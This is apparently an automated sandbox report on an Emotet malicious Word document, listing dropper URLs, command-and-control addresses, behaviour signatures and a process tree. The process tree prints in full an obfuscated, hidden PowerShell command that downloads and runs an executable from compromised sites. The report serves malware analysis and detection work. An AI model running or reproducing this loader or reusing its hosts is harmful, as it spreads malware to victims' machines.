Analysis

  • max time kernel
    25s
  • resource
    win10v191014
  • submitted
    21-01-2020 07:57

General

  • Target

    41a39aba7e866bc9556210ca2f0fdbb66cee751719cf7ca1f6ae526ef0005460

  • Sample

    200121-dn4hkr5lzs

  • SHA256

    41a39aba7e866bc9556210ca2f0fdbb66cee751719cf7ca1f6ae526ef0005460

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://demo.growmatrics.com/wp-admin/zmfkm-plqxh-765909100/

exe.dropper

http://www.crossfitheimdall.com/1ha8us/ek21iei9dl-fab4lvyuw-465996896/

exe.dropper

http://www.bancadelluniverso.it/softaculous/OfkQExY/

exe.dropper

http://www.demo.thedryerventpro.com/wp-admin/601o97lmde-she8j1-4176106/

exe.dropper

http://www.escuelaunosanagustin.com/wp-admin/a0dmmx-3m2-2574/

Extracted

Family

emotet

C2

153.183.25.24:80

153.137.36.142:80

178.152.92.246:80

178.33.167.120:8080

144.76.56.36:8080

176.58.93.123:80

51.38.134.203:8080

77.74.78.80:443

58.92.179.55:443

187.72.47.161:443

106.248.79.174:80

58.185.224.18:80

60.152.212.149:80

41.185.29.128:8080

89.215.225.15:80

98.178.241.106:80

183.91.3.63:80

37.70.131.107:80

46.17.6.116:8080

78.210.132.35:80

rsa_pubkey.plain

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\41a39aba7e866bc9556210ca2f0fdbb66cee751719cf7ca1f6ae526ef0005460.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4944
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABPAHQAZwBrAGQAcQBpAHAAPQAnAFoAZQBrAGMAaQBmAGoAagBxACcAOwAkAFgAbQBmAGYAagBpAHcAcABrACAAPQAgACcANQA5ACcAOwAkAE4AbwB5AG0AegB3AHoAdQB5AHgAcQBmAGoAPQAnAFgAaAB2AHcAZgBhAGEAeQBoAHYAZAAnADsAJABIAHQAZgB5AG4AdgBoAGsAbABmAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFgAbQBmAGYAagBpAHcAcABrACsAJwAuAGUAeABlACcAOwAkAE4AZwB0AGIAYQBwAGcAcgA9ACcAUQBtAHAAcQBoAGMAbwBmAHMAbwBwACcAOwAkAE4AagBtAGoAdQB6AG8AcgB1AHYAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AVwBFAGIAQwBsAGkARQBOAFQAOwAkAFgAYwB1AGcAeQBwAGEAdwBiAHEAdAA9ACcAaAB0AHQAcAA6AC8ALwBkAGUAbQBvAC4AZwByAG8AdwBtAGEAdAByAGkAYwBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB6AG0AZgBrAG0ALQBwAGwAcQB4AGgALQA3ADYANQA5ADAAOQAxADAAMAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGMAcgBvAHMAcwBmAGkAdABoAGUAaQBtAGQAYQBsAGwALgBjAG8AbQAvADEAaABhADgAdQBzAC8AZQBrADIAMQBpAGUAaQA5AGQAbAAtAGYAYQBiADQAbAB2AHkAdQB3AC0ANAA2ADUAOQA5ADYAOAA5ADYALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAGEAbgBjAGEAZABlAGwAbAB1AG4AaQB2AGUAcgBzAG8ALgBpAHQALwBzAG8AZgB0AGEAYwB1AGwAbwB1AHMALwBPAGYAawBRAEUAeABZAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZABlAG0AbwAuAHQAaABlAGQAcgB5AGUAcgB2AGUAbgB0AHAAcgBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA2ADAAMQBvADkANwBsAG0AZABlAC0AcwBoAGUAOABqADEALQA0ADEANwA2ADEAMAA2AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZQBzAGMAdQBlAGwAYQB1AG4AbwBzAGEAbgBhAGcAdQBzAHQAaQBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBhADAAZABtAG0AeAAtADMAbQAyAC0AMgA1ADcANAAvACcALgAiAHMAYABQAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVgBlAHUAegBtAHEAcQBxAD0AJwBYAGgAcwBkAG8AZQB1AG4AeQBrAHEAZQBrACcAOwBmAG8AcgBlAGEAYwBoACgAJABVAGsAdQBsAGsAcwBmAGcAaAAgAGkAbgAgACQAWABjAHUAZwB5AHAAYQB3AGIAcQB0ACkAewB0AHIAeQB7ACQATgBqAG0AagB1AHoAbwByAHUAdgAuACIAZABvAHcAbgBsAGAATwBgAEEAZABGAGAASQBsAEUAIgAoACQAVQBrAHUAbABrAHMAZgBnAGgALAAgACQASAB0AGYAeQBuAHYAaABrAGwAZgB1ACkAOwAkAFQAdgB0AHEAawBtAG0AYgBlAHkAPQAnAFEAdQBiAHYAYQB1AHEAcwBpACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQASAB0AGYAeQBuAHYAaABrAGwAZgB1ACkALgAiAEwAYABFAGAATgBnAFQAaAAiACAALQBnAGUAIAAzADEANQA1ADUAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQASAB0AGYAeQBuAHYAaABrAGwAZgB1ACkAOwAkAEEAeQBiAHIAYgBsAHEAdABlAG8AcwB1AHgAPQAnAEoAawBnAG4AZgByAHkAZABzAHcAJwA7AGIAcgBlAGEAawA7ACQASwB1AHgAYgBlAHgAdABwAGwAawB2AD0AJwBIAGQAYgBiAGIAZwB4AHoAaQBnAGkAYwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAGMAdgBpAHUAbQB1AGYAegBoAG4AbgA9ACcASwB6AHoAcABnAHQAeABuACcA
    1⤵
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4552
    • C:\Users\Admin\59.exe
      "C:\Users\Admin\59.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4716
      • C:\Users\Admin\59.exe
        --c00e4bae
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:4684
  • C:\Windows\SysWOW64\msgroam.exe
    "C:\Windows\SysWOW64\msgroam.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:3712
    • C:\Windows\SysWOW64\msgroam.exe
      --3116e0a0
      2⤵
      • Suspicious behavior: EmotetMutantsSpam
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4340

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3712-12-0x0000000000600000-0x0000000000617000-memory.dmp

    Filesize

    92KB

  • memory/4340-15-0x00000000004F0000-0x0000000000507000-memory.dmp

    Filesize

    92KB

  • memory/4340-16-0x0000000000400000-0x000000000046A000-memory.dmp

    Filesize

    424KB

  • memory/4684-10-0x0000000000400000-0x000000000046A000-memory.dmp

    Filesize

    424KB

  • memory/4684-9-0x0000000002130000-0x0000000002147000-memory.dmp

    Filesize

    92KB

  • memory/4716-6-0x00000000005D0000-0x00000000005E7000-memory.dmp

    Filesize

    92KB